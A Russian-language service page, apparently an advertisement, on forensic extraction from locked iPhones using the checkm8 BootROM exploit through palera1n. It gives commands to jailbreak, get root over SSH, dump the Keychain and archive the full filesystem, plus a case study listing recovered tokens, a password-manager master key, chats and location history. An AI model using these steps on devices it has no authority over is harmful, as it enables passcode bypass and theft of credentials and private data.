1. Почему checkm8 / checkra1n / palera1n
Checkm8 — аппаратная уязвимость в BootROM (A5-A11 чипы). Неисправима обновлением iOS. Позволяет загрузить неподписанный код на этапе DFU mode до проверки подписи iBoot. Palera1n — современный инструмент для iOS 15-17, поддерживает rootful (full FS) и rootless (ограниченный) режимы.
Ключевое преимущество: не требует разблокировки экрана (passcode/FaceID). Устройство переводится в DFU, эксплойт даёт shell с root правами, далее — монтируем /private/var и / (rootfs).
2. Процесс извлечения (rootful palera1n)
# 1. Перевод в DFU
# 2. Запуск palera1n rootful
palera1n --rootful --tweaks --force-revert
# 3. SSH на устройство (USB tunneling)
iproxy 2222 44
ssh root@localhost -p 2222
# 4. Монтирование FS
mount -o rw,union,update /
mount -o rw,union,update /private/var
# 5. Дамп Keychain
security dump-keychain -d login.keychain > keychain.txt
# 6. Полный тарболл FS
tar -czf /tmp/full_fs.tar.gz --exclude=/dev --exclude=/proc --exclude=/sys /
# 7. Выгрузка через USB
scp -P 2222 root@localhost:/tmp/full_fs.tar.gz ./Rootful режим даёт доступ ко всей ФС включая /var/Keychains, /var/mobile/Library, /var/mobile/Containers/Data/Application. Rootless — только пользовательская область (Keychain недоступен полностью).
3. Парсинг и анализ (iLEAPP / ALEAPP)
Сырой дамп нечитаем напрямую. Используем iLEAPP (iOS Logs, Events, And Properties Parser) — автоматически парсит:
4. Ограничения и нюансы
5. Реальный кейс: расследование утечки
Клиент — юридическая фирма. iPhone 8 сотрудника (iOS 16.7) в составе расследования корпоративной утечки. Устройство залочено, пароль неизвестен, сотрудник уволен.
Keychain
Apple ID токен, корпоративный VPN (Cisco AnyConnect), Slack token, 1Password master key (в Keychain)
Signal / Telegram
Полные истории чатов (SQLite), ключи шифрования из Keychain → расшифровка локальных БД
Geolocation
LocationD: 14 000 точек за 6 месяцев. Выяснили встречи с конкурентом.
Отчёт передан юристам. Доказательная база для суда. Устройство возвращено в исходном состоянии (palera1n --force-revert удаляет все следы джейлбрейка).
iPhone 8—X залочен? Нужен полный дамп для суда/расследования?
Checkm8 extraction — единственный способ получить Keychain и полную ФС без пароля. iOS 12-17. 3-4 часа. Данные целы.
Заказать iOS Forensics